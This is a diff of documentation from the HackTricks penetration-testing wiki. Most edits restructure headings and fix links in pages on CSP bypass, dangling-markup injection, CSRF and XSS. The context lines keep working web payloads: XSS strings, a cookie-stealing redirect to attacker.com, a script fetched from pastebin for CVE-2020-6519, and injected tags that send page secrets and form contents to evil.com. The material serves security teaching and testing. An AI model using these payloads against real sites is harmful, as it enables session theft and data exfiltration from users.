-{% content-ref url="../../../forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md" %}
-[.pyc.md](../../../forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md)
+{% content-ref url="../../../generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md" %}
+[.pyc.md](../../../generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md)
 {% endcontent-ref %}
 
-# Misc Python
+## Misc Python
 
-## Assert
+### Assert
 
 Python executed with optimizations with the param `-O` will remove asset statements and any code conditional on the value of **debug**.\
 Therefore, checks like
@@ -884,7 +883,7 @@ def check_permission(super_user):
 
 will be bypassed
 
-# References
+## References
 
 * [https://lbarman.ch/blog/pyjail/](https://lbarman.ch/blog/pyjail/)
 * [https://ctf-wiki.github.io/ctf-wiki/pwn/linux/sandbox/python-sandbox-escape/](https://ctf-wiki.github.io/ctf-wiki/pwn/linux/sandbox/python-sandbox-escape/)
@@ -893,7 +892,6 @@ will be bypassed
 * [https://nedbatchelder.com/blog/201206/eval\_really\_is\_dangerous.html](https://nedbatchelder.com/blog/201206/eval\_really\_is\_dangerous.html)
 * [https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6](https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6)
 
-
 <details>
 
 <summary><strong>Support HackTricks and get benefits!</strong></summary>
@@ -909,5 +907,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
 
 </details>
-
-

mobile-pentesting/android-app-pentesting/README.md

@@ -202,7 +202,7 @@ Then, decompress all the DLsL using [**xamarin-decompress**](https://github.com/
 python3 xamarin-decompress.py -o /path/to/decompressed/apk
 ```
 
-and finally you can use [**these recommended tools**](../../reversing/reversing-tools-basic-methods/#net-decompiler) to **read C# code** from the DLLs.
+and finally you can use [**these recommended tools**](../../group-1/reversing-tools-basic-methods/#net-decompiler) to **read C# code** from the DLLs.
 
 ### Automated Static Code Analysis
 

pentesting-web/content-security-policy-csp-bypass/README.md

@@ -1,4 +1,4 @@
-
+# Content Security Policy (CSP) Bypass
 
 <details>
 
@@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 
 </details>
 
-
-# What is CSP
+## What is CSP
 
 Content Security Policy or CSP is a built-in browser technology which **helps protect from attacks such as cross-site scripting (XSS)**. It lists and describes paths and sources, from which the browser can safely load resources. The resources may include images, frames, javascript and more. Here is an example of allowing resource from the local domain (self) to be loaded and executed in-line and allow string code executing functions like `eval`, `setTimeout` or `setInterval:`
 
@@ -35,12 +34,12 @@ Implemented via meta tag:
 <meta http-equiv="Content-Security-Policy" content="default-src 'self'; img-src https://*; child-src 'none';">
 ```
 
-## Headers
+### Headers
 
 * `Content-Security-Policy`
 * `Content-Security-Policy-Report-Only`This one won't block anything, only send reports (use in Pre environment).
 
-# Defining resources
+## Defining resources
 
 CSP works by restricting the origins that active and passive content can be loaded from. It can additionally restrict certain aspects of active content such as the execution of inline javascript, and the use of `eval()`.
 
@@ -56,7 +55,7 @@ media-src https://videos.cdn.mozilla.net;
 object-src 'none';
 ```
 
-## Directives
+### Directives
 
 * **script-src**: This directive specifies allowed sources for JavaScript. This includes not only URLs loaded directly into elements, but also things like inline script event handlers (onclick) and XSLT stylesheets which can trigger script execution.
 * **default-src**: This directive defines the policy for fetching resources by default. When fetch directives are absent in CSP header the browser follows this directive by default.
@@ -75,7 +74,7 @@ object-src 'none';
 * **upgrade-insecure-requests**: This directive instructs browsers to rewrite URL schemes, changing HTTP to HTTPS. This directive can be useful for websites with large numbers of old URL's that need to be rewritten.
 * **sandbox**: sandbox directive enables a sandbox for the requested resource similar to the sandbox attribute. It applies restrictions to a page's actions including preventing popups, preventing the execution of plugins and scripts, and enforcing a same-origin policy.
 
-## **Sources**
+### **Sources**
 
 * \*: This allows any URL except `data:` , `blob:` , `filesystem:` schemes
 * **self**: This source defines that loading of resources on the page is allowed from the same domain.
@@ -87,9 +86,9 @@ object-src 'none';
 * **nonce**: A whitelist for specific inline scripts using a cryptographic nonce (number used once). The server must generate a unique nonce value each time it transmits a policy.
 * **sha256-\<hash>**: Whitelist scripts with an specific sha256 hash
 
-# Unsafe Scenarios
+## Unsafe Scenarios
 
-## 'unsafe-inline'
+### 'unsafe-inline'
 
 ```yaml
 Content-Security-Policy: script-src https://google.com 'unsafe-inline'; 
@@ -97,13 +96,13 @@ Content-Security-Policy: script-src https://google.com 'unsafe-inline';
 
 Working payload: `"/><script>alert(1);</script>`
 
-### self + 'unsafe-inline' via Iframes
+#### self + 'unsafe-inline' via Iframes
 
 {% content-ref url="csp-bypass-self-+-unsafe-inline-with-iframes.md" %}
 [csp-bypass-self-+-unsafe-inline-with-iframes.md](csp-bypass-self-+-unsafe-inline-with-iframes.md)
 {% endcontent-ref %}
 
-## 'unsafe-eval'
+### 'unsafe-eval'
 
 ```yaml
 Content-Security-Policy: script-src https://google.com 'unsafe-eval'; 
@@ -111,7 +110,7 @@ Content-Security-Policy: script-src https://google.com 'unsafe-eval';
 
 Working payload: `<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>`
 
-## Wildcard
+### Wildcard
 
 ```yaml
 Content-Security-Policy: script-src 'self' https://google.com https: data *; 
@@ -124,7 +123,7 @@ Working payload:
 "/>'><script src=data:text/javascript,alert(1337)></script>
 ```
 
-## Lack of object-src and default-src
+### Lack of object-src and default-src
 
 ```yaml
 Content-Security-Policy: script-src 'self' ;
@@ -138,7 +137,7 @@ Working payloads:
 <param name="AllowScriptAccess" value="always"></object>
 ```
 
-## File Upload + 'self'
+### File Upload + 'self'
 
 ```yaml
 Content-Security-Policy: script-src 'self';  object-src 'none' ; 
@@ -158,7 +157,7 @@ Moreover, even if you could upload a **JS code inside** a file using a extension
 
 From here, if you find a XSS and a file upload, and you manage to find a **misinterpreted extension**, you could try to upload a file with that extension and the Content of the script. Or, if the server is checking the correct format of the uploaded file, create a polyglot ([some polyglot examples here](https://github.com/Polydet/polyglot-database)).
 
-## Third Party Endpoints + 'unsafe-eval'
+### Third Party Endpoints + 'unsafe-eval'
 
 ```yaml
 Content-Security-Policy: script-src https://cdnjs.cloudflare.com 'unsafe-eval'; 
@@ -171,7 +170,7 @@ Load a vulnerable version of angular and execute arbitrary JS:
 <div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1);//');}} </div>
 ```
 
-### Other payloads:
+#### Other payloads:
 
 ```markup
 <script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></script>
@@ -187,7 +186,7 @@ Load a vulnerable version of angular and execute arbitrary JS:
 <div ng-app ng-csp id=p ng-click=$event.view.alert(1337)>
 ```
 
-## Third Party Endpoints + JSONP
+### Third Party Endpoints + JSONP
 
 ```http
 Content-Security-Policy: script-src 'self' https://www.google.com; object-src 'none';
@@ -204,22 +203,22 @@ Scenarios like this where `script-src` is set to `self` and a particular domain
 
 The same vulnerability will occur if the **trusted endpoint contains an Open Redirect**, because if the initial endpoint is trusted, redirects are trusted.
 
-## Folder path bypass
+### Folder path bypass
 
 If CSP policy points to a folder and you use **%2f** to encode **"/"**, it is still considered to be inside the folder. All browsers seem to agree on that.\
 This leads to a possible bypass, by using "**%2f..%2f**" if server decodes it. For example, if CSP allows `http://example.com/company/` you can bypass the folder restriction and execute: `http://example.com/company%2f..%2fattacker/file.js`
 
 Online Example:[ ](https://jsbin.com/werevijewa/edit?html,output)[https://jsbin.com/werevijewa/edit?html,output](https://jsbin.com/werevijewa/edit?html,output)
 
-## Iframes JS execution
+### Iframes JS execution
 
 {% content-ref url="../xss-cross-site-scripting/iframes-in-xss-and-csp.md" %}
 [iframes-in-xss-and-csp.md](../xss-cross-site-scripting/iframes-in-xss-and-csp.md)
 {% endcontent-ref %}
 
-## missing **base-uri**
+### missing **base-uri**
 
-If the **base-uri** directive is missing you can abuse it to perform a [**dangling markup injection**](../dangling-markup-html-scriptless-injection.md).
+If the **base-uri** directive is missing you can abuse it to perform a [**dangling markup injection**](../dangling-markup-html-scriptless-injection/).
 
 Moreover, if the **page is loading a script using a relative path** (like `/js/app.js`) using a **Nonce**, you can abuse the **base** **tag** to make it **load** the script from **your own server achieving a XSS.**\
 If the vulnerable page is loaded with **httpS**, make use a httpS url in the base.
@@ -228,7 +227,7 @@ If the vulnerable page is loaded with **httpS**, make use a httpS url in the bas
 <base href="https://www.attacker.com/">
 ```
 
-## AngularJS events
+### AngularJS events
 
 Depending on the specific policy, the CSP will block JavaScript events. However, AngularJS defines its own events that can be used instead. When inside an event, AngularJS defines a special `$event` object, which simply references the browser event object. You can use this object to perform a CSP bypass. On Chrome, there is a special property on the `$event/event` object called `path`. This property contains an array of objects that causes the event to be executed. The last property is always the `window` object, which we can use to perform a sandbox escape. By passing this array to the `orderBy` filter, we can enumerate the array and use the last element (the `window` object) to execute a global function, such as `alert()`. The following code demonstrates this:
 
@@ -239,7 +238,7 @@ Depending on the specific policy, the CSP will block JavaScript events. However,
 
 **Find other Angular bypasses in** [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)
 
-## AngularJS and whitelisted domain
+### AngularJS and whitelisted domain
 
 ```
 Content-Security-Policy: script-src 'self' ajax.googleapis.com; object-src 'none' ;report-uri /Report-parsing-url;
@@ -254,11 +253,11 @@ Working payloads:
 ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script>
 ```
 
-## Bypass CSP with dangling markup
+### Bypass CSP with dangling markup
 
-Read [how here](../dangling-markup-html-scriptless-injection.md).
+Read [how here](../dangling-markup-html-scriptless-injection/).
 
-## 'unsafe-inline'; img-src \*; via XSS
+### 'unsafe-inline'; img-src \*; via XSS
 
 ```
 default-src 'self' 'unsafe-inline'; img-src *;
@@ -276,7 +275,7 @@ From: [https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle](
 
 You could also abuse this configuration to **load javascript code inserted inside an image**. If for example, the page allows to load images from twitter. You could **craft** an **special image**, **upload** it to twitter and abuse the "**unsafe-inline**" to **execute**a JS code (as a regular XSS) that will **load** the **image**, **extract** the **JS** from it and **execute** **it**: [https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/](https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/)
 
-## img-src \*; via XSS (iframe) - Time attack
+### img-src \*; via XSS (iframe) - Time attack
 
 Notice the lack of the directive `'unsafe-inline'`\
 This time you can make the victim **load** a page in **your control** via **XSS** with a `<iframe`. This time you are going to make the victim access the page from where you want to extract information (**CSRF**). You cannot access the content of the page, but if somehow you can **control the time the page needs to load** you can extract the information you need.
@@ -342,13 +341,13 @@ run();
 </script>
 ```
 
-## [CVE-2020-6519](https://www.perimeterx.com/tech-blog/2020/csp-bypass-vuln-disclosure/)
+### [CVE-2020-6519](https://www.perimeterx.com/tech-blog/2020/csp-bypass-vuln-disclosure/)
 
 ```javascript
 document.querySelector('DIV').innerHTML="<iframe src='javascript:var s = document.createElement(\"script\");s.src = \"https://pastebin.com/raw/dw5cWGK6\";document.body.appendChild(s);'></iframe>";
 ```
 
-## Leaking Information CSP + Iframe
+### Leaking Information CSP + Iframe
 
 Imagine a situation where a **page is redirecting** to a different **page with a secret depending** on the **user**. For example the user **admin** accessing **redirectme.domain1.com** is redirected to: **adminsecret321.domain2.com** and you can cause a XSS to the admin.\
 **Also the page redirected isn't allowed by the security policy, but the page that redirects is.**
@@ -368,11 +367,11 @@ img-src https://chall.secdriven.dev https://doc-1-3213.secdrivencontent.dev http
 
 Trick from [**here**](https://ctftime.org/writeup/29310).
 
-# CSP Exfiltration Bypasses
+## CSP Exfiltration Bypasses
 
 If there is a strict CSP that doesn't allow you to **interact with external servers**, there some things you can always do to exfiltrate the information.
 
-## Location
+### Location
 
 You could just update the location to send to the attackers server the secret information:
 
@@ -381,7 +380,7 @@ var sessionid = document.cookie.split('=')[1]+".";
 document.location = "https://attacker.com/?" + sessionid;
 ```
 
-## Meta tag
+### Meta tag
 
 You could redirect injecting a meta tag (this is just a redirect, this won't leak content)
 
@@ -389,7 +388,7 @@ You could redirect injecting a meta tag (this is just a redirect, this won't lea
 <meta http-equiv="refresh" content="1; http://attacker.com">
 ```
 
-## DNS Prefetch
+### DNS Prefetch
 
 To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for a later usage.\
 You can indicate a browser to pre-resolve a hostname with: `<link reol="dns-prefetch" href="something.com">`
@@ -421,7 +420,7 @@ X-DNS-Prefetch-Control: off
 Apparently this technique doesn't work in headless browsers (bots)
 {% endhint %}
 
-## WebRTC
+### WebRTC
 
 In several pages you can read that **WebRTC doesn't check the `connect-src` policy** of the CSP.
 
@@ -432,13 +431,13 @@ pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp));
 
 However, it doesn't look like it's [not possible anymore](https://github.com/w3c/webrtc-nv-use-cases/issues/35) (or at least not that easy).
 
-If you know how to exfiltrate info with WebRTC [**send a pull request please!**](https://github.com/carlospolop/hacktricks)****
+If you know how to exfiltrate info with WebRTC [**send a pull request please!**](https://github.com/carlospolop/hacktricks)\*\*\*\*
 
-# Policy Injection
+## Policy Injection
 
 **Research:** [**https://portswigger.net/research/bypassing-csp-with-policy-injection**](https://portswigger.net/research/bypassing-csp-with-policy-injection)
 
-## Chrome
+### Chrome
 
 If a **parameter** sent by you is being **pasted inside** the **declaration** of the **policy,** then you could **alter** the **policy** in some way that makes **it useless**. You could **allow script 'unsafe-inline'** with any of these bypasses:
 
@@ -450,21 +449,21 @@ script-src-elem 'unsafe-inline'; script-src-attr 'unsafe-inline'
 Because this directive will **overwrite existing script-src directives**.\
 You can find an example here: [http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=%3Bscript-src-elem+\*\&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E](http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=%3Bscript-src-elem+\*\&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E)
 
-## Edge
+### Edge
 
 In Edge is much simpler. If you can add in the CSP just this: **`;_`** **Edge** would **drop** the entire **policy**.\
 Example: [http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=;\_\&y=%3Cscript%3Ealert(1)%3C/script%3E](http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=;\_\&y=%3Cscript%3Ealert\(1\)%3C/script%3E)
 
-# Checking CSP Policies Online
+## Checking CSP Policies Online
 
 * [https://csp-evaluator.withgoogle.com/](https://csp-evaluator.withgoogle.com)
 * [https://cspvalidator.org/](https://cspvalidator.org/#url=https://cspvalidator.org/)
 
-# Automatically creating CSP
+## Automatically creating CSP
 
 [https://csper.io/docs/generating-content-security-policy](https://csper.io/docs/generating-content-security-policy)
 
-# References
+## References
 
 {% embed url="https://hackdefense.com/blog/csp-the-how-and-why-of-a-content-security-policy/" %}
 
@@ -474,7 +473,6 @@ Example: [http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=;\_\&y
 
 {% embed url="https://0xn3va.gitbook.io/cheat-sheets/web-application/content-security-policy#allowed-data-scheme" %}
 
-
 <details>
 
 <summary><strong>Support HackTricks and get benefits!</strong></summary>
@@ -490,5 +488,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
 
 </details>
-
-

pentesting-web/csrf-cross-site-request-forgery.md

@@ -183,7 +183,7 @@ To set the domain name of the server in the URL that the Referrer is going to se
 
 ### **Exfiltrating CSRF Token**
 
-If a **CSRF token** is being used as **defence** you could try to **exfiltrate it** abusing a [**XSS**](xss-cross-site-scripting/#xss-stealing-csrf-tokens) vulnerability or a [**Dangling Markup**](dangling-markup-html-scriptless-injection.md) vulnerability.
+If a **CSRF token** is being used as **defence** you could try to **exfiltrate it** abusing a [**XSS**](xss-cross-site-scripting/#xss-stealing-csrf-tokens) vulnerability or a [**Dangling Markup**](dangling-markup-html-scriptless-injection/) vulnerability.
 
 ### **GET using HTML tags**
 

pentesting-web/dangling-markup-html-scriptless-injection/README.md

@@ -1,4 +1,4 @@
-
+# Dangling Markup - HTML scriptless injection
 
 <details>
 
@@ -16,17 +16,16 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 
 </details>
 
+## Resume
 
-# Resume
-
-This technique can be use to extract information from a user when an **HTML injection is found**. This is very useful if you **don't find any way to exploit a** [**XSS** ](xss-cross-site-scripting/)but you can **inject some HTML tags**.\
+This technique can be use to extract information from a user when an **HTML injection is found**. This is very useful if you **don't find any way to exploit a** [**XSS** ](../xss-cross-site-scripting/)but you can **inject some HTML tags**.\
 It is also useful if some **secret is saved in clear text** in the HTML and you want to **exfiltrate** it from the client, or if you want to mislead some script execution.
 
-Several techniques commented here can be used to bypass some [**Content Security Policy**](content-security-policy-csp-bypass/) by exfiltrating information in unexpected ways (html tags, CSS, http-meta tags, forms, base...).
+Several techniques commented here can be used to bypass some [**Content Security Policy**](../content-security-policy-csp-bypass/) by exfiltrating information in unexpected ways (html tags, CSS, http-meta tags, forms, base...).
 
-# Main Applications
+## Main Applications
 
-## Stealing clear text secrets
+### Stealing clear text secrets
 
 If you inject `<img src='http://evil.com/log.cgi?` when the page is loaded the victim will send you all the code between the injected `img` tag and the next quote inside the code. If a secret is somehow located in that chunk, you will steal i t(you can do the same thing using a double quote,take a look which could be more interesting to use).
 
@@ -60,7 +59,7 @@ You could also insert a `<base` tag. All the information will be sent until the
 steal me'<b>test</b>
 ```
 
-## Stealing forms
+### Stealing forms
 
 ```markup
 <base href='http://evil.com/'>
@@ -68,11 +67,11 @@ steal me'<b>test</b>
 
 Then, the forms that send data to path (like `<form action='update_profile.php'>`) will send the data to the malicious domain.
 
-## Stealing forms 2
+### Stealing forms 2
 
 Set a form header: `<form action='http://evil.com/log_steal'>` this will overwrite the next form header and all the data from the form will be sent to the attacker.
 
-## Stealing forms 3
+### Stealing forms 3
 
 The button can change the URL where the information of the form is going to be sent with the attribute "formaction":
 
@@ -82,7 +81,7 @@ The button can change the URL where the information of the form is going to be s
 
 An attacker can use this to steal the information.
 
-## Stealing clear text secrets 2
+### Stealing clear text secrets 2
 
 Using the latest mentioned technique to steal forms (injecting a new form header) you can then inject a new input field:
 
@@ -98,7 +97,7 @@ You can do the same thing injecting a form and an `<option>` tag. All the data u
 <form action=http://google.com><input type="submit">Click Me</input><select name=xss><option
 ```
 
-## Form parameter injection
+### Form parameter injection
 
 You can change the path of a form and insert new values so an unexpected action will be performed:
 
@@ -116,7 +115,7 @@ You can change the path of a form and insert new values so an unexpected action
 </form>
 ```
 
-## Stealing clear text secrets via noscript
+### Stealing clear text secrets via noscript
 
 `<noscript></noscript>` Is a tag whose content will be interpreted if the browser doesn't support javascript (you can enable/disable Javascript in Chrome in [chrome://settings/content/javascript](chrome://settings/content/javascript)).
 
@@ -126,7 +125,7 @@ A way to exfiltrate the content of the web page from the point of injection to t
 <noscript><form action=http://evil.com><input type=submit style="position:absolute;left:0;top:0;width:100%;height:100%;" type=submit value=""><textarea name=contents></noscript>
 ```
 
-## Bypassing CSP with user interaction
+### Bypassing CSP with user interaction
 
 From this [portswiggers research](https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup) you can learn that even from the **most CSP restricted** environments you can still **exfiltrate data** with some **user interaction**. In this occasion we are going to use the payload:
 
@@ -145,7 +144,7 @@ if(window.name) {
 </script>
 ```
 
-## Misleading script workflow 1 - HTML namespace attack
+### Misleading script workflow 1 - HTML namespace attack
 
 Insert a new tag with and id inside the HTML that will overwrite the next one and with a value that will affect the flow of a script. In this example you are selecting with whom a information is going to be shared:
 
@@ -164,7 +163,7 @@ function submit_status_update() {
 }
 ```
 
-## Misleading script workflow 2 - Script namespace attack
+### Misleading script workflow 2 - Script namespace attack
 
 Create variables inside javascript namespace by inserting HTML tags. Then, this variable will affect the flow of the application:
 
@@ -190,7 +189,7 @@ function submit_new_acls() {
 }
 ```
 
-## Abuse of JSONP
+### Abuse of JSONP
 
 If you find a JSONP interface you could be able to call an arbitrary function with arbitrary data:
 
@@ -212,7 +211,7 @@ Or you can even try to execute some javascript:
 <script src='/search?q=a&call=alert(1)'></script>
 ```
 
-## Iframe abuse
+### Iframe abuse
 
 Notice that a **child document can view and set location property for parent, even if cross-origin.** This means that you can make the client access any other page by loading inside an **iframe** some code like:
 
@@ -222,13 +221,13 @@ Notice that a **child document can view and set location property for parent, ev
 
 This can be mitigated with something like: _**sandbox=’ allow-scripts allow-top-navigation’**_
 
-## \<meta abuse
+### \<meta abuse
 
 You could use **`meta http-equiv`** to perform **several actions** like setting a Cookie: `<meta http-equiv="Set-Cookie" Content="SESSID=1">` or performing a redirect (in 5s in this case): `<meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />`
 
 This can be **avoided** with a **CSP** regarding **http-equiv** ( `Content-Security-Policy: default-src 'self';`, or `Content-Security-Policy: http-equiv 'self';`)
 
-## New \<portal HTML tag
+### New \<portal HTML tag
 
 You can find a very **interesting research** on exploitable vulnerabilities of the \<portal tag [here](https://research.securitum.com/security-analysis-of-portal-element/).\
 At the moment of this writing you need to enable the portal tag on Chrome in `chrome://flags/#enable-portals` or it won't work.
@@ -237,23 +236,23 @@ At the moment of this writing you need to enable the portal tag on Chrome in `ch
 <portal src='https://attacker-server?
 ```
 
-## HTML Leaks
+### HTML Leaks
 
 Not all the ways to leak connectivity in HTML will be useful for Dangling Markup, but sometimes it could help. Check them here: [https://github.com/cure53/HTTPLeaks/blob/master/leak.html](https://github.com/cure53/HTTPLeaks/blob/master/leak.html)
 
-# Char-by-char Leaks
+## Char-by-char Leaks
 
 You can find techniques like **CSS injection or Lazy Load Images** explained in this post to **leak secrets from a HTML without JS execution char by char**:
 
-{% content-ref url="dangling-markup-html-scriptless-injection/html-injection-char-by-char-exfiltration/" %}
-[html-injection-char-by-char-exfiltration](dangling-markup-html-scriptless-injection/html-injection-char-by-char-exfiltration/)
+{% content-ref url="html-injection-char-by-char-exfiltration/" %}
+[html-injection-char-by-char-exfiltration](html-injection-char-by-char-exfiltration/)
 {% endcontent-ref %}
 
-# Brute-Force Detection List
+## Brute-Force Detection List
 
 {% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/dangling_markup.txt" %}
 
-# References
+## References
 
 All the techniques presented here and more can view reviewed with more details in:
 
@@ -267,7 +266,6 @@ More info:
 
 {% embed url="https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup" %}
 
-
 <details>
 
 <summary><strong>Support HackTricks and get benefits!</strong></summary>
@@ -283,5 +281,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
 
 </details>
-
-

pentesting-web/web-vulnerabilities-methodology.md

@@ -46,7 +46,7 @@ If the introduced data may somehow being reflected in the response, the page mig
 * [ ] [**Client Side Template Injection**](client-side-template-injection-csti.md)
 * [ ] [**Command Injection**](command-injection.md)
 * [ ] [**CRLF**](crlf-0d-0a.md)
-* [ ] [**Dangling Markup**](dangling-markup-html-scriptless-injection.md)
+* [ ] [**Dangling Markup**](dangling-markup-html-scriptless-injection/)
 * [ ] [**File Inclusion/Path Traversal**](file-inclusion/)
 * [ ] [**Open Redirect**](open-redirect.md)
 * [ ] [**Prototype Pollution to XSS**](deserialization/nodejs-proto-prototype-pollution/#client-side-prototype-pollution-to-xss)

pentesting-web/xss-cross-site-scripting/README.md

@@ -37,7 +37,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
          2. Can you use events or attributes supporting `javascript:` protocol?
          3. Can you bypass protections?
          4. Is the HTML content being interpreted by any client side JS engine (_AngularJS_, _VueJS_, _Mavo_...), you could abuse a [**Client Side Template Injection**](../client-side-template-injection-csti.md).
-         5. If you cannot create HTML tags that execute JS code, could you abuse a [**Dangling Markup - HTML scriptless injection**](../dangling-markup-html-scriptless-injection.md)?
+         5. If you cannot create HTML tags that execute JS code, could you abuse a [**Dangling Markup - HTML scriptless injection**](../dangling-markup-html-scriptless-injection/)?
       2. Inside a **HTML tag**:
          1. Can you exit to raw HTML context?
          2. Can you create new events/attributes to execute JS code?
@@ -225,7 +225,7 @@ If in order to exploit the vulnerability you need the **user to click a link or
 
 #### Impossible - Dangling Markup
 
-If you just think that **it's impossible to create an HTML tag with an attribute to execute JS code**, you should check [**Danglig Markup** ](../dangling-markup-html-scriptless-injection.md)because you could **exploit** the vulnerability **without** executing **JS** code.
+If you just think that **it's impossible to create an HTML tag with an attribute to execute JS code**, you should check [**Danglig Markup** ](../dangling-markup-html-scriptless-injection/)because you could **exploit** the vulnerability **without** executing **JS** code.
 
 ### Injecting inside HTML tag
 

stealing-sensitive-information-disclosure-from-a-web.md

@@ -1,4 +1,4 @@
-
+# Stealing Sensitive Information Disclosure from a Web
 
 <details>
 
@@ -16,15 +16,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 
 </details>
 
-
 If at some point you find a **web page that presents you sensitive information based on your session**: Maybe it's reflecting cookies, or printing or CC details or any other sensitive information, you may try to steal it.\
 Here I present you the main ways to can try to achieve it:
 
 * [**CORS bypass**](pentesting-web/cors-bypass.md): If you can bypass CORS headers you will be able to steal the information performing Ajax request for a malicious page.
 * [**XSS**](pentesting-web/xss-cross-site-scripting/): If you find a XSS vulnerability on the page you may be able to abuse it to steal the information.
-* [**Danging Markup**](pentesting-web/dangling-markup-html-scriptless-injection.md): If you cannot inject XSS tags you still may be able to steal the info using other regular HTML tags.
-* [**Clickjaking**](pentesting-web/clickjacking.md): If there is no  protection against this attack, you may be able to trick the user into sending you the sensitive data (an example [here](https://medium.com/bugbountywriteup/apache-example-servlet-leads-to-61a2720cac20)).
-
+* [**Danging Markup**](pentesting-web/dangling-markup-html-scriptless-injection/): If you cannot inject XSS tags you still may be able to steal the info using other regular HTML tags.
+* [**Clickjaking**](pentesting-web/clickjacking.md): If there is no protection against this attack, you may be able to trick the user into sending you the sensitive data (an example [here](https://medium.com/bugbountywriteup/apache-example-servlet-leads-to-61a2720cac20)).
 
 <details>
 
@@ -41,5 +39,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
 
 </details>
-
-